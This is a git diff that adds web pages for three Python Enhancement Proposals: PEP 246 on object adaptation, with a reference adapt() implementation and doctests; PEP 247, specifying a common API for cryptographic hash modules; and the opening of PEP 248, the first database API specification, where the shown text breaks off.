+ + + + + \ No newline at end of file diff --git a/pep-0246/index.html b/pep-0246/index.html new file mode 100644 index 00000000000..d9d3269099d --- /dev/null +++ b/pep-0246/index.html @@ -0,0 +1,820 @@ + + + + + + + + PEP 246 – Object Adaptation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 246 – Object Adaptation

+
+
Author:
+
Alex Martelli <aleaxit at gmail.com>, +Clark C. Evans <cce at clarkevans.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
21-Mar-2001
+
Python-Version:
+
2.5
+
Post-History:
+
29-Mar-2001, 10-Jan-2005
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

I’m rejecting this PEP. Something much better is about to happen; +it’s too early to say exactly what, but it’s not going to resemble +the proposal in this PEP too closely so it’s better to start a new +PEP. GvR.

+
+
+

Abstract

+

This proposal puts forth an extensible cooperative mechanism for +the adaptation of an incoming object to a context which expects an +object supporting a specific protocol (say a specific type, class, +or interface).

+

This proposal provides a built-in “adapt” function that, for any +object X and any protocol Y, can be used to ask the Python +environment for a version of X compliant with Y. Behind the +scenes, the mechanism asks object X: “Are you now, or do you know +how to wrap yourself to provide, a supporter of protocol Y?”. +And, if this request fails, the function then asks protocol Y: +“Does object X support you, or do you know how to wrap it to +obtain such a supporter?” This duality is important, because +protocols can be developed after objects are, or vice-versa, and +this PEP lets either case be supported non-invasively with regard +to the pre-existing component[s].

+

Lastly, if neither the object nor the protocol know about each +other, the mechanism may check a registry of adapter factories, +where callables able to adapt certain objects to certain protocols +can be registered dynamically. This part of the proposal is +optional: the same effect could be obtained by ensuring that +certain kinds of protocols and/or objects can accept dynamic +registration of adapter factories, for example via suitable custom +metaclasses. However, this optional part allows adaptation to be +made more flexible and powerful in a way that is not invasive to +either protocols or other objects, thereby gaining for adaptation +much the same kind of advantage that Python standard library’s +“copy_reg” module offers for serialization and persistence.

+

This proposal does not specifically constrain what a protocol +is, what “compliance to a protocol” exactly means, nor what +precisely a wrapper is supposed to do. These omissions are +intended to leave this proposal compatible with both existing +categories of protocols, such as the existing system of type and +classes, as well as the many concepts for “interfaces” as such +which have been proposed or implemented for Python, such as the +one in PEP 245, the one in Zope3 [2], or the ones discussed in +the BDFL’s Artima blog in late 2004 and early 2005 [3]. However, +some reflections on these subjects, intended to be suggestive and +not normative, are also included.

+
+
+

Motivation

+

Currently there is no standardized mechanism in Python for +checking if an object supports a particular protocol. Typically, +existence of certain methods, particularly special methods such as +__getitem__, is used as an indicator of support for a particular +protocol. This technique works well for a few specific protocols +blessed by the BDFL (Benevolent Dictator for Life). The same can +be said for the alternative technique based on checking +‘isinstance’ (the built-in class “basestring” exists specifically +to let you use ‘isinstance’ to check if an object “is a [built-in] +string”). Neither approach is easily and generally extensible to +other protocols, defined by applications and third party +frameworks, outside of the standard Python core.

+

Even more important than checking if an object already supports a +given protocol can be the task of obtaining a suitable adapter +(wrapper or proxy) for the object, if the support is not already +there. For example, a string does not support the file protocol, +but you can wrap it into a StringIO instance to obtain an object +which does support that protocol and gets its data from the string +it wraps; that way, you can pass the string (suitably wrapped) to +subsystems which require as their arguments objects that are +readable as files. Unfortunately, there is currently no general, +standardized way to automate this extremely important kind of +“adaptation by wrapping” operations.

+

Typically, today, when you pass objects to a context expecting a particular protocol, either the object knows about the context and provides its own wrapper or the context knows about the object and wraps it appropriately. The difficulty with these approaches is that such adaptations are one-offs, are not centralized in a single place of the user’s code, and are not executed with a common technique. This lack of standardization increases code duplication with the same adapter occurring in more than one place or it encourages classes to be re-written instead of adapted. In either case, maintainability suffers.

+

It would be very nice to have a standard function that can be +called upon to verify an object’s compliance with a particular +protocol and provide for a wrapper if one is readily available – +all without having to hunt through each library’s documentation +for the incantation appropriate to that particular, specific case.

+
+
+

Requirements

+

When considering an object’s compliance with a protocol, there are +several cases to be examined:

+
    +
  1. When the protocol is a type or class, and the object has +exactly that type or is an instance of exactly that class (not +a subclass). In this case, compliance is automatic.
  2. +
  3. When the object knows about the protocol, and either considers +itself compliant, or knows how to wrap itself suitably.
  4. +
  5. When the protocol knows about the object, and either the object +already complies or the protocol knows how to suitably wrap the +object.
  6. +
  7. When the protocol is a type or class, and the object is a +member of a subclass. This is distinct from the first case (a) +above, since inheritance (unfortunately) does not necessarily +imply substitutability, and thus must be handled carefully.
  8. +
  9. When the context knows about the object and the protocol and +knows how to adapt the object so that the required protocol is +satisfied. This could use an adapter registry or similar +approaches.
  10. +
+

The fourth case above is subtle. A break of substitutability can occur when a subclass changes a method’s signature, or restricts the domains accepted for a method’s argument (“co-variance” on argument types), or extends the co-domain to include return values which the base class may never produce (“contra-variance” on return types). While compliance based on class inheritance should be automatic, this proposal allows an object to signal that it is not compliant with a base class protocol.

+

If Python gains some standard “official” mechanism for interfaces, +however, then the “fast-path” case (a) can and should be extended +to the protocol being an interface, and the object an instance of +a type or class claiming compliance with that interface. For +example, if the “interface” keyword discussed in [3] is adopted +into Python, the “fast path” of case (a) could be used, since +instantiable classes implementing an interface would not be +allowed to break substitutability.

+
+
+

Specification

+

This proposal introduces a new built-in function, adapt(), which +is the basis for supporting these requirements.

+

The adapt() function has three parameters:

+
    +
  • obj, the object to be adapted
  • +
  • protocol, the protocol requested of the object
  • +
  • alternate, an optional object to return if the object could +not be adapted
  • +
+

A successful result of the adapt() function returns either the object passed, obj, if the object is already compliant with the protocol, or a secondary object, a wrapper, which provides a view of the object compliant with the protocol. The definition of wrapper is deliberately vague, and a wrapper is allowed to be a full object with its own state if necessary. However, the design intention is that an adaptation wrapper should hold a reference to the original object it wraps, plus (if needed) a minimum of extra state which it cannot delegate to the wrapped object.

+

An excellent example of an adaptation wrapper is an instance of StringIO which adapts an incoming string to be read as if it were a textfile: the wrapper holds a reference to the string, but deals by itself with the “current point of reading” (where in the wrapped string the characters for the next, e.g., “readline” call will come from), because it cannot delegate it to the wrapped object (a string has no concept of “current point of reading” nor anything else even remotely related to that concept).

+

A failure to adapt the object to the protocol raises an AdaptationError (which is a subclass of TypeError), unless the alternate parameter is used, in which case the alternate argument is returned instead.
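A sketch of the two failure modes, using the names proposed above (adapt was never added as a built-in; obj and handle_failure are placeholders):

try:
    f = adapt(obj, file)                 # raises AdaptationError on failure
except AdaptationError:
    handle_failure()

f = adapt(obj, file, alternate=None)     # or ask for a sentinel instead
if f is None:
    handle_failure()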

+

To enable the first case listed in the requirements, the adapt() +function first checks to see if the object’s type or the object’s +class are identical to the protocol. If so, then the adapt() +function returns the object directly without further ado.

+

To enable the second case, when the object knows about the +protocol, the object must have a __conform__() method. This +optional method takes two arguments:

+
    +
  • self, the object being adapted
  • +
  • protocol, the protocol requested
  • +
+

Just like any other special method in today’s Python, __conform__ +is meant to be taken from the object’s class, not from the object +itself (for all objects, except instances of “classic classes” as +long as we must still support the latter). This enables a +possible ‘tp_conform’ slot to be added to Python’s type objects in +the future, if desired.

+

The object may return itself as the result of __conform__ to +indicate compliance. Alternatively, the object also has the +option of returning a wrapper object compliant with the protocol. +If the object knows it is not compliant although it belongs to a +type which is a subclass of the protocol, then __conform__ should +raise a LiskovViolation exception (a subclass of AdaptationError). +Finally, if the object cannot determine its compliance, it should +return None to enable the remaining mechanisms. If __conform__ +raises any other exception, “adapt” just propagates it.
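As a sketch of these possible return values (the protocol object and wrapper class below are invented), a class might implement __conform__ like this:

class TextSource(object):
    def __conform__(self, protocol):
        if protocol is ReadableFile:        # hypothetical protocol object
            return ReadableWrapper(self)    # hypothetical compliant wrapper
        return None                         # let adapt() try __adapt__ etc.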

+

To enable the third case, when the protocol knows about the +object, the protocol must have an __adapt__() method. This +optional method takes two arguments:

+
    +
  • self, the protocol requested
  • +
  • obj, the object being adapted
  • +
+

If the protocol finds the object to be compliant, it can return +obj directly. Alternatively, the method may return a wrapper +compliant with the protocol. If the protocol knows the object is +not compliant although it belongs to a type which is a subclass of +the protocol, then __adapt__ should raise a LiskovViolation +exception (a subclass of AdaptationError). Finally, when +compliance cannot be determined, this method should return None to +enable the remaining mechanisms. If __adapt__ raises any other +exception, “adapt” just propagates it.

+

The fourth case, when the object’s class is a sub-class of the +protocol, is handled by the built-in adapt() function. Under +normal circumstances, if “isinstance(object, protocol)” then +adapt() returns the object directly. However, if the object is +not substitutable, either the __conform__() or __adapt__() +methods, as above mentioned, may raise an LiskovViolation (a +subclass of AdaptationError) to prevent this default behavior.

+

If none of the first four mechanisms worked, as a last-ditch +attempt, ‘adapt’ falls back to checking a registry of adapter +factories, indexed by the protocol and the type of obj, to meet +the fifth case. Adapter factories may be dynamically registered +and removed from that registry to provide “third party adaptation” +of objects and protocols that have no knowledge of each other, in +a way that is not invasive to either the object or the protocols.

+
+
+

Intended Use

+

The typical intended use of adapt is in code which has received +some object X “from the outside”, either as an argument or as the +result of calling some function, and needs to use that object +according to a certain protocol Y. A “protocol” such as Y is +meant to indicate an interface, usually enriched with some +semantics constraints (such as are typically used in the “design +by contract” approach), and often also some pragmatical +expectation (such as “the running time of a certain operation +should be no worse than O(N)”, or the like); this proposal does +not specify how protocols are designed as such, nor how or whether +compliance to a protocol is checked, nor what the consequences may +be of claiming compliance but not actually delivering it (lack of +“syntactic” compliance – names and signatures of methods – will +often lead to exceptions being raised; lack of “semantic” +compliance may lead to subtle and perhaps occasional errors +[imagine a method claiming to be threadsafe but being in fact +subject to some subtle race condition, for example]; lack of +“pragmatic” compliance will generally lead to code that runs +correctly, but too slowly for practical use, or sometimes to +exhaustion of resources such as memory or disk space).

+

When protocol Y is a concrete type or class, compliance to it is +intended to mean that an object allows all of the operations that +could be performed on instances of Y, with “comparable” semantics +and pragmatics. For example, a hypothetical object X that is a +singly-linked list should not claim compliance with protocol +‘list’, even if it implements all of list’s methods: the fact that +indexing X[n] takes time O(n), while the same operation would be +O(1) on a list, makes a difference. On the other hand, an +instance of StringIO.StringIO does comply with protocol ‘file’, +even though some operations (such as those of module ‘marshal’) +may not allow substituting one for the other because they perform +explicit type-checks: such type-checks are “beyond the pale” from +the point of view of protocol compliance.

+

While this convention makes it feasible to use a concrete type or +class as a protocol for purposes of this proposal, such use will +often not be optimal. Rarely will the code calling ‘adapt’ need +ALL of the features of a certain concrete type, particularly for +such rich types as file, list, dict; rarely can all those features +be provided by a wrapper with good pragmatics, as well as syntax +and semantics that are really the same as a concrete type’s.

+

Rather, once this proposal is accepted, a design effort needs to +start to identify the essential characteristics of those protocols +which are currently used in Python, particularly within the +standard library, and to formalize them using some kind of +“interface” construct (not necessarily requiring any new syntax: a +simple custom metaclass would let us get started, and the results +of the effort could later be migrated to whatever “interface” +construct is eventually accepted into the Python language). With +such a palette of more formally designed protocols, the code using +‘adapt’ will be able to ask for, say, adaptation into “a filelike +object that is readable and seekable”, or whatever else it +specifically needs with some decent level of “granularity”, rather +than too-generically asking for compliance to the ‘file’ protocol.

+

Adaptation is NOT “casting”. When object X itself does not +conform to protocol Y, adapting X to Y means using some kind of +wrapper object Z, which holds a reference to X, and implements +whatever operation Y requires, mostly by delegating to X in +appropriate ways. For example, if X is a string and Y is ‘file’, +the proper way to adapt X to Y is to make a StringIO(X), NOT to +call file(X) [which would try to open a file named by X].
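For instance, in Python 2 of the era:

from StringIO import StringIO

x = "line one\nline two\n"
y = StringIO(x)          # adaptation: wrap x, holding a reference to it
print y.readline()       # file-like behavior; prints 'line one'
# ...whereas file(x) would have tried to open a file named by x.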

+

Numeric types and protocols may need to be an exception to this +“adaptation is not casting” mantra, however.

+
+
+

Guido’s “Optional Static Typing: Stop the Flames” Blog Entry

+

A typical simple use case of adaptation would be:

+
def f(X):
+    X = adapt(X, Y)
+    # continue by using X according to protocol Y
+
+
+

In [4], the BDFL has proposed introducing the syntax:

+
def f(X: Y):
+    # continue by using X according to protocol Y
+
+
+

to be a handy shortcut for exactly this typical use of adapt, and, +as a basis for experimentation until the parser has been modified +to accept this new syntax, a semantically equivalent decorator:

+
@arguments(Y)
+def f(X):
+    # continue by using X according to protocol Y
+
+
+

These BDFL ideas are fully compatible with this proposal, as are +other of Guido’s suggestions in the same blog.

+
+
+

Reference Implementation and Test Cases

+

The following reference implementation does not deal with classic classes: it considers only new-style classes. If classic classes need to be supported, the additions should be pretty clear, though a bit messy (x.__class__ vs type(x), getting bound methods directly from the object rather than from the type, and so on).

+
-----------------------------------------------------------------
+adapt.py
+-----------------------------------------------------------------
+class AdaptationError(TypeError):
+    pass
+class LiskovViolation(AdaptationError):
+    pass
+
+_adapter_factory_registry = {}
+
+def registerAdapterFactory(objtype, protocol, factory):
+    _adapter_factory_registry[objtype, protocol] = factory
+
+def unregisterAdapterFactory(objtype, protocol):
+    del _adapter_factory_registry[objtype, protocol]
+
+def _adapt_by_registry(obj, protocol, alternate):
+    factory = _adapter_factory_registry.get((type(obj), protocol))
+    if factory is None:
+        adapter = alternate
+    else:
+        adapter = factory(obj, protocol, alternate)
+    if adapter is AdaptationError:
+        raise AdaptationError
+    else:
+        return adapter
+
+
+def adapt(obj, protocol, alternate=AdaptationError):
+
+    t = type(obj)
+
+    # (a) first check to see if object has the exact protocol
+    if t is protocol:
+       return obj
+
+    try:
+        # (b) next check if t.__conform__ exists & likes protocol
+        conform = getattr(t, '__conform__', None)
+        if conform is not None:
+            result = conform(obj, protocol)
+            if result is not None:
+                return result
+
+        # (c) then check if protocol.__adapt__ exists & likes obj
+        adapt = getattr(type(protocol), '__adapt__', None)
+        if adapt is not None:
+            result = adapt(protocol, obj)
+            if result is not None:
+                return result
+    except LiskovViolation:
+        pass
+    else:
+        # (d) check if object is instance of protocol
+        if isinstance(obj, protocol):
+            return obj
+
+    # (e) last chance: try the registry
+    return _adapt_by_registry(obj, protocol, alternate)
+
+-----------------------------------------------------------------
+test.py
+-----------------------------------------------------------------
+from adapt import AdaptationError, LiskovViolation, adapt
+from adapt import registerAdapterFactory, unregisterAdapterFactory
+import doctest
+
+class A(object):
+    '''
+    >>> a = A()
+    >>> a is adapt(a, A)   # case (a)
+    True
+    '''
+
+class B(A):
+    '''
+    >>> b = B()
+    >>> b is adapt(b, A)   # case (d)
+    True
+    '''
+
+class C(object):
+    '''
+    >>> c = C()
+    >>> c is adapt(c, B)   # case (b)
+    True
+    >>> c is adapt(c, A)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    def __conform__(self, protocol):
+        if protocol is B:
+            return self
+
+class D(C):
+    '''
+    >>> d = D()
+    >>> d is adapt(d, D)   # case (a)
+    True
+    >>> d is adapt(d, C)   # case (d) explicitly blocked
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    def __conform__(self, protocol):
+        if protocol is C:
+            raise LiskovViolation
+
+class MetaAdaptingProtocol(type):
+    def __adapt__(cls, obj):
+        return cls.adapt(obj)
+
+class AdaptingProtocol:
+    __metaclass__ = MetaAdaptingProtocol
+    @classmethod
+    def adapt(cls, obj):
+        pass
+
+class E(AdaptingProtocol):
+    '''
+    >>> a = A()
+    >>> a is adapt(a, E)   # case (c)
+    True
+>>> b = B()
+    >>> b is adapt(b, E)   # case (c)
+    True
+    >>> c = C()
+    >>> c is adapt(c, E)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    '''
+    @classmethod
+    def adapt(cls, obj):
+        if isinstance(obj, A):
+            return obj
+
+class F(object):
+    pass
+
+def adapt_F_to_A(obj, protocol, alternate):
+    if isinstance(obj, F) and issubclass(protocol, A):
+        return obj
+    else:
+        return alternate
+
+def test_registry():
+    '''
+    >>> f = F()
+    >>> f is adapt(f, A)   # a failure case
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    >>> registerAdapterFactory(F, A, adapt_F_to_A)
+    >>> f is adapt(f, A)   # case (e)
+    True
+    >>> unregisterAdapterFactory(F, A)
+    >>> f is adapt(f, A)   # a failure case again
+    Traceback (most recent call last):
+        ...
+    AdaptationError
+    >>> registerAdapterFactory(F, A, adapt_F_to_A)
+    '''
+
+doctest.testmod()
+
+
+
+
+

Relationship To Microsoft’s QueryInterface

+

Although this proposal has some similarities to Microsoft’s (COM) QueryInterface, it differs in a number of aspects.

+

First, adaptation in this proposal is bi-directional, allowing the interface (protocol) to be queried as well, which gives more dynamic abilities (more Pythonic). Second, there is no special “IUnknown” interface which can be used to check or obtain the original unwrapped object identity, although this could be proposed as one of those “special” blessed interface protocol identifiers. Third, with QueryInterface, once an object supports a particular interface it must always thereafter support this interface; this proposal makes no such guarantee, since, in particular, adapter factories can be dynamically added to the registry and removed again later.

+

Fourth, implementations of Microsoft’s QueryInterface must support +a kind of equivalence relation – they must be reflexive, +symmetrical, and transitive, in specific senses. The equivalent +conditions for protocol adaptation according to this proposal +would also represent desirable properties:

+
# given, to start with, a successful adaptation:
+X_as_Y = adapt(X, Y)
+
+# reflexive:
+assert adapt(X_as_Y, Y) is X_as_Y
+
+# transitive:
+X_as_Z = adapt(X, Z, None)
+X_as_Y_as_Z = adapt(X_as_Y, Z, None)
+assert (X_as_Y_as_Z is None) == (X_as_Z is None)
+
+# symmetrical:
+X_as_Z_as_Y = adapt(X_as_Z, Y, None)
+assert (X_as_Y_as_Z is None) == (X_as_Z_as_Y is None)
+
+
+

However, while these properties are desirable, it may not be possible to guarantee them in all cases. QueryInterface can impose their equivalents because it dictates, to some extent, how objects, interfaces, and adapters are to be coded; this proposal is meant to be non-invasive, usable to “retrofit” adaptation between two frameworks coded in mutual ignorance of each other, without having to modify either framework.

+

Transitivity of adaptation is in fact somewhat controversial, as +is the relationship (if any) between adaptation and inheritance.

+

The latter would not be controversial if we knew that inheritance always implies Liskov substitutability, which, unfortunately, we don’t. If some special form, such as the interfaces proposed in [4], could indeed ensure Liskov substitutability, then for that kind of inheritance, only, we could perhaps assert that if X conforms to Y and Y inherits from Z then X conforms to Z… but only if substitutability were taken in a very strong sense to include semantics and pragmatics, which seems doubtful. (For what it’s worth: in QueryInterface, inheritance neither requires nor implies conformance.) This proposal does not include any “strong” effects of inheritance, beyond the small ones specifically detailed above.

+

Similarly, transitivity might imply multiple “internal” adaptation passes to get the result of adapt(X, Z) via some intermediate Y, intrinsically like adapt(adapt(X, Y), Z), for some suitable and automatically chosen Y. Again, this may perhaps be feasible under suitably strong constraints, but the practical implications of such a scheme are still unclear to this proposal’s authors. Thus, this proposal does not include any automatic or implicit transitivity of adaptation, under any circumstances.

+

For an implementation of the original version of this proposal +which performs more advanced processing in terms of transitivity, +and of the effects of inheritance, see Phillip J. Eby’s +PyProtocols [5]. The documentation accompanying PyProtocols is +well worth studying for its considerations on how adapters should +be coded and used, and on how adaptation can remove any need for +typechecking in application code.

+
+
+

Questions and Answers

+
    +
  • Q: What benefit does this proposal provide?

A: The typical Python programmer is an integrator, someone who is connecting components from various suppliers. Often, to interface between these components, one needs intermediate adapters. Usually the burden falls upon the programmer to study the interface exposed by one component and required by another, determine whether they are directly compatible, or develop an adapter. Sometimes a supplier may even include the appropriate adapter, but even then searching for the adapter and figuring out how to deploy it takes time.

    +

This technique enables suppliers to work with each other directly, by implementing __conform__ or __adapt__ as necessary. This frees the integrator from making their own adapters. In essence, this allows the components to have a simple dialogue among themselves. The integrator simply connects one component to another, and if the types don’t automatically match, an adapting mechanism is built in (see the sketch after this list).

    +

    Moreover, thanks to the adapter registry, a “fourth party” may +supply adapters to allow interoperation of frameworks which +are totally unaware of each other, non-invasively, and without +requiring the integrator to do anything more than install the +appropriate adapter factories in the registry at start-up.

    +

    As long as libraries and frameworks cooperate with the +adaptation infrastructure proposed here (essentially by +defining and using protocols appropriately, and calling +‘adapt’ as needed on arguments received and results of +call-back factory functions), the integrator’s work thereby +becomes much simpler.

    +

    For example, consider SAX1 and SAX2 interfaces: there is an +adapter required to switch between them. Normally, the +programmer must be aware of this; however, with this +adaptation proposal in place, this is no longer the case – +indeed, thanks to the adapter registry, this need may be +removed even if the framework supplying SAX1 and the one +requiring SAX2 are unaware of each other.

    +
  • Q: Why does this have to be built-in, can’t it be standalone?

A: Yes, it does work standalone. However, if it is built-in, it has a greater chance of being used. The value of this proposal is primarily in standardization: having libraries and frameworks coming from different suppliers, including the Python standard library, use a single approach to adaptation. Furthermore:

    +
      +
    1. The mechanism is by its very nature a singleton.
    2. If used frequently, it will be much faster as a built-in.
    3. It is extensible and unassuming.
    4. Once ‘adapt’ is built-in, it can support syntax extensions and even be of some help to a type inference system.
    +
  • Q: Why the verbs __conform__ and __adapt__?

    A: conform, verb intransitive

    +
      +
    1. To correspond in form or character; be similar.
    2. To act or be in accord or agreement; comply.
    3. To act in accordance with current customs or modes.
    +

    adapt, verb transitive

    +
      +
    1. To make suitable to or fit for a specific use or situation.
    +

    Source: The American Heritage Dictionary of the English +Language, Third Edition

    +
+
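To make that dialogue concrete, here is a minimal sketch using the adapt() function from the reference implementation above; the names Frame, Renderable, and RenderableFrame are purely illustrative:

class Renderable:                       # protocol required by framework Two
    pass

class RenderableFrame:                  # adapter wrapping a Frame
    def __init__(self, frame):
        self.frame = frame

class Frame:                            # object supplied by framework One
    def __conform__(self, protocol):
        if protocol is Renderable:
            return RenderableFrame(self)

widget = adapt(Frame(), Renderable)     # integrator code: no hand-written glue
assert isinstance(widget, RenderableFrame)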
+
+

Backwards Compatibility

+

There should be no problem with backwards compatibility unless +someone had used the special names __conform__ or __adapt__ in +other ways, but this seems unlikely, and, in any case, user code +should never use special names for non-standard purposes.

+

This proposal could be implemented and tested without changes to +the interpreter.

+
+
+

Credits

+

This proposal was created in large part by the feedback of the +talented individuals on the main Python mailing lists and the +type-sig list. To name specific contributors (with apologies if +we missed anyone!), besides the proposal’s authors: the main +suggestions for the proposal’s first versions came from Paul +Prescod, with significant feedback from Robin Thomas, and we also +borrowed ideas from Marcin ‘Qrczak’ Kowalczyk and Carlos Ribeiro.

+

Other contributors (via comments) include Michel Pelletier, Jeremy +Hylton, Aahz Maruch, Fredrik Lundh, Rainer Deyke, Timothy Delaney, +and Huaiyu Zhu. The current version owes a lot to discussions +with (among others) Phillip J. Eby, Guido van Rossum, Bruce Eckel, +Jim Fulton, and Ka-Ping Yee, and to study and reflection of their +proposals, implementations, and documentation about use and +adaptation of interfaces and protocols in Python.

+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0246.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0247/index.html b/pep-0247/index.html
new file mode 100644
index 00000000000..a5a7bca74b1
--- /dev/null
+++ b/pep-0247/index.html
@@ -0,0 +1,270 @@
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 247 – API for Cryptographic Hash Functions

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
23-Mar-2001
+
Post-History:
+
20-Sep-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

There are several different modules available that implement cryptographic +hashing algorithms such as MD5 or SHA. This document specifies a standard API +for such algorithms, to make it easier to switch between different +implementations.

+
+
+

Specification

+

All hashing modules should present the same interface. Additional methods or +variables can be added, but those described in this document should always be +present.

+

Hash function modules define one function:

+
+
new([string])            (unkeyed hashes)
+
new([key], [string])    (keyed hashes)
+
+
+
Create a new hashing object and return it. The first form is for hashes +that are unkeyed, such as MD5 or SHA. For keyed hashes such as HMAC, key +is a required parameter containing a string giving the key to use. In both +cases, the optional string parameter, if supplied, will be immediately +hashed into the object’s starting state, as if obj.update(string) +was called.

After creating a hashing object, arbitrary strings can be fed into the +object using its update() method, and the hash value can be obtained at +any time by calling the object’s digest() method.

+

Arbitrary additional keyword arguments can be added to this function, but if +they’re not supplied, sensible default values should be used. For example, +rounds and digest_size keywords could be added for a hash function +which supports a variable number of rounds and several different output +sizes, and they should default to values believed to be secure.

+
+
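As a concrete illustration of the keyed form, the standard library’s hmac module follows this calling convention (Python 3 byte strings shown; the digestmod argument is required in current Python):

import hmac

h = hmac.new(b'secret-key', b'message', digestmod='sha256')
print(h.digest_size)    # 32, measured in bytes as this PEP specifies
print(h.hexdigest())    # lowercase hexadecimal digits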

Hash function modules define one variable:

+
+
digest_size
+
+
+
An integer value; the size of the digest produced by the hashing objects +created by this module, measured in bytes. You could also obtain this value +by creating a sample object and accessing its digest_size attribute, but +it can be convenient to have this value available from the module. Hashes +with a variable output size will set this variable to None.
+

Hashing objects require a single attribute:

+
+
digest_size
+
+
+
This attribute is identical to the module-level digest_size variable, +measuring the size of the digest produced by the hashing object, measured in +bytes. If the hash has a variable output size, this output size must be +chosen when the hashing object is created, and this attribute must contain +the selected size. Therefore, None is not a legal value for this +attribute.
+

Hashing objects require the following methods:

+
+
copy()
+
+
+
Return a separate copy of this hashing object. An update to this copy won’t +affect the original object.
+
+
digest()
+
+
+
Return the hash value of this hashing object as a string containing 8-bit +data. The object is not altered in any way by this function; you can +continue updating the object after calling this function.
+
+
hexdigest()
+
+
+
Return the hash value of this hashing object as a string containing +hexadecimal digits. Lowercase letters should be used for the digits a +through f. Like the .digest() method, this method mustn’t alter the +object.
+
+
update(string)
+
+
+
Hash string into the current state of the hashing object. update() can +be called any number of times during a hashing object’s lifetime.
+

Hashing modules can define additional module-level functions or object methods +and still be compliant with this specification.

+

Here’s an example, using a module named MD5:

+
>>> from Crypto.Hash import MD5
+>>> m = MD5.new()
+>>> m.digest_size
+16
+>>> m.update('abc')
+>>> m.digest()
+'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+>>> m.hexdigest()
+'900150983cd24fb0d6963f7d28e17f72'
+>>> MD5.new('abc').digest()
+'\x90\x01P\x98<\xd2O\xb0\xd6\x96?}(\xe1\x7fr'
+
+
+
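The same exchange works, modulo bytes-versus-str, with the modern hashlib module, which follows the same interface:

>>> import hashlib
>>> m = hashlib.md5()
>>> m.digest_size
16
>>> m.update(b'abc')
>>> m.hexdigest()
'900150983cd24fb0d6963f7d28e17f72'
>>> hashlib.md5(b'abc').digest() == m.digest()
True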
+
+

Rationale

+

The digest size is measured in bytes, not bits, even though hash algorithm +sizes are usually quoted in bits; MD5 is a 128-bit algorithm and not a 16-byte +one, for example. This is because, in the sample code I looked at, the length +in bytes is often needed (to seek ahead or behind in a file; to compute the +length of an output string) while the length in bits is rarely used. Therefore, +the burden will fall on the few people actually needing the size in bits, who +will have to multiply digest_size by 8.

+

It’s been suggested that the update() method would be better named +append(). However, that method is really causing the current state of the +hashing object to be updated, and update() is already used by the md5 and +sha modules included with Python, so it seems simplest to leave the name +update() alone.

+

The order of the constructor’s arguments for keyed hashes was a sticky issue. +It wasn’t clear whether the key should come first or second. It’s a required +parameter, and the usual convention is to place required parameters first, but +that also means that the string parameter moves from the first position to +the second. It would be possible to get confused and pass a single argument to +a keyed hash, thinking that you’re passing an initial string to an unkeyed +hash, but it doesn’t seem worth making the interface for keyed hashes more +obscure to avoid this potential error.

+
+
+

Changes

+

2001-09-17: Renamed clear() to reset(); added digest_size attribute +to objects; added .hexdigest() method.

+

2001-09-20: Removed reset() method completely.

+

2001-09-28: Set digest_size to None for variable-size hashes.

+
+
+

Acknowledgements

+

Thanks to Aahz, Andrew Archibald, Rich Salz, Itamar Shtull-Trauring, and the +readers of the python-crypto list for their comments on this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0247.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0248/index.html b/pep-0248/index.html
new file mode 100644
index 00000000000..2939e3cd68c
--- /dev/null
+++ b/pep-0248/index.html
@@ -0,0 +1,361 @@
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 248 – Python Database API Specification v1.0

+
+
Author:
+
Greg Stein <gstein at lyra.org>, Marc-André Lemburg <mal at lemburg.com>
+
Discussions-To:
+
Db-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
08-May-1996
+
Post-History:
+

+
Superseded-By:
+
249
+
+
+
+
Table of Contents +
+
+

Introduction

+

This API has been defined to encourage similarity between the +Python modules that are used to access databases. By doing this, +we hope to achieve a consistency leading to more easily understood +modules, code that is generally more portable across databases, +and a broader reach of database connectivity from Python.

+

This interface specification consists of several items:

+
    +
  • Module Interface
  • Connection Objects
  • Cursor Objects
  • DBI Helper Objects
+

Comments and questions about this specification may be directed to +the SIG on Tabular Databases in Python +(http://www.python.org/sigs/db-sig).

+

This specification document was last updated on: April 9, 1996. +It will be known as Version 1.0 of this specification.

+
+
+

Module Interface

+

The database interface modules should typically be named with +something terminated by db. Existing examples are: oracledb, +informixdb, and pg95db. These modules should export several +names:

+
+
modulename(connection_string)
Constructor for creating a connection to the database. +Returns a Connection Object.
+
error
Exception raised for errors from the database module.
+
+
+
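A hedged sketch of typical usage under this specification; the module name exampledb, its connection string, and the table are hypothetical, and the parameter-free query sidesteps the database-specific marker notation:

import exampledb                    # hypothetical 1.0-compliant module

conn = exampledb.exampledb('host:database:user')   # returns a Connection Object
cur = conn.cursor()
cur.execute('SELECT name, amount FROM inventory')
rows = cur.fetchall()               # list of tuples
conn.commit()
conn.close()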
+

Connection Objects

+

Connection Objects should respond to the following methods:

+
+
close()
Close the connection now (rather than whenever __del__ is +called). The connection will be unusable from this point +forward; an exception will be raised if any operation is +attempted with the connection.
+
commit()
Commit any pending transaction to the database.
+
rollback()
Roll the database back to the start of any pending +transaction.
+
cursor()
Return a new Cursor Object. An exception may be thrown if +the database does not support a cursor concept.
+
callproc([params])
(Note: this method is not well-defined yet.) Call a +stored database procedure with the given (optional) +parameters. Returns the result of the stored procedure.
+
(all Cursor Object attributes and methods)
